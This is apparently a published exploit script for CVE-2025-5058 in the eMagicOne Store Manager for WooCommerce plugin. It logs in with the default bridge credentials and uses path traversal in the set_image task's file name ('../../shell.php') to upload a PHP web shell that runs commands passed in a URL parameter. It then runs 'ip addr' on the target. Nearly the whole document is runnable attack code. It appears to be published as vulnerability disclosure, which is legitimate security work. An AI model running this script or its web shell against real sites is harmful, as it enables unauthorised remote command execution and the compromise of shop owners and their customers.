# Exploit Title: eMagicOne Store Manager for WooCommerce <= 1.2.5 - Unauthenticated Arbitrary File Upload via set_image Task
# Date: 05/17/2025
# Exploit Author: Ryan Kozak https://ryankozak.com
# Vendor Homepage:  https://emagicone.com
# Version: <= 1.2.5
# Tested on: 1.2.5
# CVE : CVE-2025-5058

import time
import urllib3
import hashlib
import argparse
import requests


def main():
    
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    ENTITY_TYPE = "product"
    IMAGE_ID = "../../shell.php"

    # Parse command line arguments
    parser = argparse.ArgumentParser(description="CVE-2025-5058: Exploit for set_image file upload vulnerability in Store Manager Connector")
    parser.add_argument("victim_url", help="Target url or ip address.")
    parser.add_argument("--username", default="1", help="Username for authentication (default: 1)")
    parser.add_argument("--password", default="1", help="Password for authentication (default: 1)")
    args = parser.parse_args()

    hash_val = hashlib.md5((args.username + args.password).encode()).hexdigest()

    session = requests.Session()
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    }

    print("[*] Requesting session key...")
    resp = session.post(
        f"{args.victim_url}/?connector=bridge",
        data={
            "hash": hash_val,
            "task": "get_version"
        },
        headers=headers,
        verify=False
    )
    print("[*] Raw response:", resp.text)
    try:
        session_key = resp.json().get("session_key")
    except Exception:
        print("[-] Failed to parse session key from response:", resp.text)
        exit(1)

    if not session_key:
        print("[-] No session key returned!")
        exit(1)
    print("[+] Got session key:", session_key)
    time.sleep(2)

    upload_url = f"{args.victim_url}/?connector=bridge"

    shell_content  = b"<?php\n"
    shell_content += b"// Silence is golden\n"
    shell_content += b"if (!empty($_GET['cmd'])) {\n"
    shell_content += b"    echo \"<pre>\".shell_exec($_GET[\"cmd\"]).\"</pre>\";\n"
    shell_content += b"}\n"
    shell_content += b"?>\r\n"

    files = {
        "file": (IMAGE_ID, shell_content, "text/plain")
    }
    data = {
        "task": "set_image",
        "entity_type": ENTITY_TYPE,
        "image_id": IMAGE_ID,
        "key": session_key
    }

    print("[*] Uploading file via set_image...")
    resp = session.post(upload_url, data=data, files=files, headers=headers, verify=False)
    print("[*] Upload response:", resp.text)

    print("[*] Executing Web Shell Commands...")
    r = requests.get(f"{args.victim_url}/{IMAGE_ID}?cmd=ip addr", verify=False)
    print(r.text)


if __name__ == "__main__":
    main()